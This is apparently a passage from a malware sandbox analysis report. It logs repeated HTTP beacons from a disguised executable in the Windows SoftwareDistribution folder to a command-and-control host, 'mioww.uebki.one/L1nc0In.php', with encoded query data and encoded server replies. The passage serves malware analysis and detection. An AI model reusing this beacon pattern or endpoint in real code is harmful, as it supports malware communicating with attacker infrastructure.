                              Aug 31, 2024 10:15:02.483905077 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:03.243643045 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2B0cOhAVf9gqp8iorIoVpliZDdkDSJHGvJMNpdOvnMzfPqx3eAntnAFxVt9GS2UXqW3nUUOpCRdBUTKqgHGPW1Hx%2B4RyQ8pY%2FufUNO5Y5aC6oZ5ZjlFa%2Fie%2BCIIZg3yN8BI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb920b4bae8c24-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.449773188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:08.265074968 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:15:09.023008108 CEST735INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fufqS0OWQ%2BPJK%2BbDQZG2xYiPi%2B%2BFBFmVcP1j2YidXb%2BwTh20pn1x8vKXscpFzkyZndAB2kF7hvF%2B606g2XnrquMQsosyNOf%2FOHRh83XL9Kc9FuU7OfMHhe7umOyGe8q6sDg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb922f4ce9184d-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.449774188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:14.032521009 CEST2080OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=d1nIiojIkNmMkNjZzM2MjZGO3MTO4EWNkVWYyQDZ4EzMzUjZjJmIsISO3IWYycjY2ADOmBjMiJDOhBzYzMWOjJWMklDM0IjZ4UDM1UDZ3IDNiojIxEjY0QGZzYmYxI2M4QDM1MzN3EWM0EGZkNTN0kjMlFmIsISNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmMiojI1kDZkNTYwYTNiVmM5QGOyMTY5QGMwYmMmZmM1cDOjNmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUa [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:15:14.768651009 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqSdhTgnItLrfg%2FYZxywxMzhDL8fc8OsqKoT%2BGIr076WKRuOHrCqfqcBH4poP8cAm%2BUHOcdQ9Q7nBa36okobVca3Iyy2JDbxZeQhjDR0atKeUaO54%2Bvl%2FIgxdc5rxpkjVw4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb925338620cb4-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.449775188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:19.813437939 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:20.526448965 CEST735INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovT5Aboyrl1IoFYizzQJS9p6onsyqu%2F%2Fwk41FijBJI2Gzfu98HJeacagbuceQqHCHIJ%2BJ7x13U%2Fut%2BtDCn2XxS%2FTZlRFWxKW%2BnOJk4Dl6ui1PnVNcahk29qPKFrRet9bf2I%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb927759f27cf6-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.449776188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:25.747983932 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:26.482889891 CEST735INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FIj0Wdgveryri0g%2FoOus%2FSR7%2BJ6Q%2Fe4PqC8OIdBqOBXsniV1pb1%2FLQKo8qLcOhe7q%2B7OSC90Tfv1zTMTdzHy19AWuSofkw2bktFLUJwg7GBOwqDNR3RiqLw8mJgWHXsWdU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb929c7b821a0f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.449777188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:31.510073900 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:32.248987913 CEST721INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRbjg3j6Pf8HgKLg4P5K6NW7OPT4Kodtm9qyoTcDlNlg7DnxC1nalJXbZw0MqqO9hnRiaY4chAsWlv755eJO5mP2XqTm7OjANeHAHDuP9hRbKTuksTGBeJ8Z973zqCohf4Q%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb92c078e48c8a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.449778188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:37.306967020 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:38.066867113 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPU3o8HNIfFLwQqhHc2U%2FvB7hJpgQv9SGiwSOgOfO7tnXXvZAFK57g4QVb7T3ZmQJbL5VaZFroWeX%2BE9ncZy%2F4WFxN8i3Pmbahv9sOYvydmnVoq5Cz4zXf2QRzQUIG7N4DY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb92e4cac4429e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.449779188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
